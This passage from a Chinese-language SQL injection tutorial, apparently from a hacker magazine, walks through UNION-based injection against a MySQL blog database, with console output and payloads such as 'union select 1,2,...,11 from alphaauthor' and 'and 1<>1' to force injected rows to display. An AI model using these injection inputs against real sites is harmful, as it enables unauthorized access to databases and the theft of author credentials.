如图（3）

我们看看id＝247中的数据先

以下是引用片段： mysql> select * from alphadb where id=347;  +-----+--------------------------------------------+-----------------  | id | title | content | importtime | author | accessing | addInto | type | showup | change_ubb | change_html |  +-----+--------------------------------------------+-----------------

| 347 | 利用adsutil.vbs+..--发表于黑客档案2004.6期 | 发表于黑客x档案第6期 | 2004

以下是引用片段： -03-28 11:50:50 | Alpha | 17 | Alpha |   2 |   1 |   1 | 1 |  +-----+--------------------------------------------+-----------------  1 row in set (0.00 sec)

我们看到，它的返回结果和

以下是引用片段： mysql> select * from alphadb where id=347 union select 1,2,3,4,5,6,7,8,9,10,11 from alphaauthor;

是相同的。
哦，大家或许会问，这样有什么用呢？
问的好。
Ok，继续试验
当我们输入一个不存在的id的时候
例如id=0，或者id=347 and 1<>1
再看看

以下是引用片段： mysql> select * from alphadb where id=347 and 1<>1 union select 1,2,3,4,5,6,7,8,9,10,11 from alphaauthor;

上一页  [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]  下一页